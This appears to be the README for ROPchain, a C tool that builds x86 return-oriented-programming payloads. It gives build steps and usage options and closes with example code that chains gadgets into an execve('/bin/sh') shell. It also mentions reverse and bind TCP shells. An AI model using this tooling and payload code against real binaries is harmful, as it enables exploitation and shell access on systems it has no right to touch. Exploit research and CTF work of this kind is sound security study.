ROPchain is a x86 systematic ROP payload generation. This tool provides an ROP API library, allowing users to generate customized payload. ROPchain is written in C using Capstone disassembly framework.
To use ROPchain, you have to install Capstone first.
After installing Capstone, download the ROPchain and build it.
$ git clone [email protected]:SQLab/ropchain.git $ cd ropchain $ make usage: ropchain <binary_file> [-p <bool>] [-o <offset>] [-b <badbyte>] [-l <length>] [-v <bool>] optional arguments: -p Print all gadgets. (default true) -o Add padding(offset) bytes to payload. (default 0) -b Bypass badbyte gadgets. ex: "00|20|0a" -l Allow maximum gadget length (default 10) -v Show gadgets search verbose (default false) If you want to replace specific gadget, please make good use of "-b" badbyte argument.
For example,
If I don't like this gadget "0x0819a2cd : pop edx; pop ebx; ret",
you can add -b "cd" argument to get another gadget.
Edit spec.c and use the ROP API to generate customized payload.
Default is execve("/bin/sh") and you can do more.
ex: Reverse TCP shell, Bind TCP shell ...
#include "spec.h" int rop_chain_payload(struct Node *root, struct Gadget *head, struct Arg *arg){struct API *api; unsigned int data = 0x080efff0; rop_build_api(root, &api, arg); printf("\n--- Start chain *execve(\"/bin/sh\")* gadgets ---\n\n"); rop_chain_list_init(head); rop_write_memory_gadget(head, api, data, 0x6e69622f); rop_write_memory_gadget(head, api, data + 4, 0x68732f2f); rop_write_memory_gadget(head, api, data + 8, 0); rop_write_register_gadget(api, "ebx", data); rop_write_register_gadget(api, "ecx", data + 8); rop_write_register_gadget(api, "edx", data + 8); rop_chain_write_register_gadget(head, api); rop_zero_register_gadget(head, api, "eax"); rop_add_register_gadget(head, api, "eax", 11); rop_interrupt_gadget(head, api); rop_end_api(api); return 0}